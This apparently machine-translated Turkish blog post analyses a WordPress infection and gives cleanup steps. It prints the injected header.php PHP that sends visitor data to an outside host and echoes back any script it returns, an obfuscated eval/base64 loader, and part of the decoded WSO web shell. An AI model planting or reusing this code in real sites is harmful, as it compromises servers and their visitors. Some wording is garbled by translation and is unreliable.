WordPress Virüs - PHP Hack - Kaldır WordPress virüs

Birkaç gün önce ben bir cihaz fark Kod şüpheli (virüs / kötü amaçlı yazılım) çalışan bir blogun kaynağında WordPress. Aşağıdaki PHP kodu mevcuttu header.phpçizgiden önce .

<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>

Bu virüsün tam olarak ne olduğunu bilmiyorum mactam olarak yaptığı şeyi yapar, ancak etkilenen sitelerin ziyaretçileri tarafından görülmez. Bunun yerine, arama motorlarında (özellikle Google'da) büyük bir sıralamaya ve dolayısıyla etkilenen web sitelerini ziyaret edenlerin sayısında önemli bir düşüşe neden olur.

Bu virüs dosyaları hakkında bilinen Detayları:

1. Header.php içinde Yukarıdaki kod mevcut

2. Bir dosyanın ortaya çıkması wp-log.php dosya wp-içerir.

wp-log

3. wp-log.php takip kodu şifreli içerir:

<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>

wp-log.php içinde şifre çözme kodu:


<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("
<pre align=center-->

<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}

function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

if(!empty($auth_pass)) {
if(isset($_POST['pass']) &amp;&amp; (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>

4. Sayfaya doğrudan erişiliyorsa blogname.com/wp-includes/wp-log.php alanı olan bir sayfa görünür kimlik doğrulama. İlk bakışta bir file yöneticisi.

temizleyiciler WORDPRESS.

1. Önce koddan silin header.php ve dosya wp-log.php itibaren wp-içerir.

2. Dosyayı kontrol edin .htaccess şüpheli direktifler. İzin satırları veya komut dosyası yürütme.

3. Tema klasörünü (/ wp-content /temalar/ Nume_tema). Şüpheli değişikliklere uğrayan yeni dosyaları ve var olanları (özellikle .php dosyaları) arayın.

4. Klasörü kontrol edin fişe takmakCES (wp-content / plugins).

5. Kontrol edin wp-content şüpheli dosyalar.

6. Klasörler ve dosyalar için yazma izinlerini kontrol edin. chmod si chown.

DEVİRİZE ÖNERİLERİ WORDPRESS.

1. İlk olarak, tüm blog dosyalarının ve veritabanının yedeğini almak iyidir.

2. Klasörleri silin wp-admin si wp-içerir ve tüm dosyalar . Php sitenin kökünden. Özel .php dosyalarınız varsa, bunları manuel olarak kontrol etmek iyi bir fikirdir.

3. Şu anki sürümünü indirin WordPress ve yükleyin.

4. Derecesi olan bir kullanıcı için veritabanını kontrol edin. administrator.

Bu virüs hakkında söylememiz gereken tek şey bu, ancak eklemeleriniz varsa veya yeni ayrıntılar keşfedersek, bu makaleyi güncellemekten memnuniyet duyarız.

STEALTH SETTINGS - KALDIR WORDPRESS VİRÜS .

nasıl » önemli » WordPress Virüs - PHP Hack - Kaldır WordPress virüs

Kurucu ve editör Stealth Settings, 2006'dan günümüze. İşletim sistemleri konusunda deneyim Linux (Özellikle CentOS), Mac OS X, Windows XP> Windows 10 si WordPress (İYS).

Leave a Comment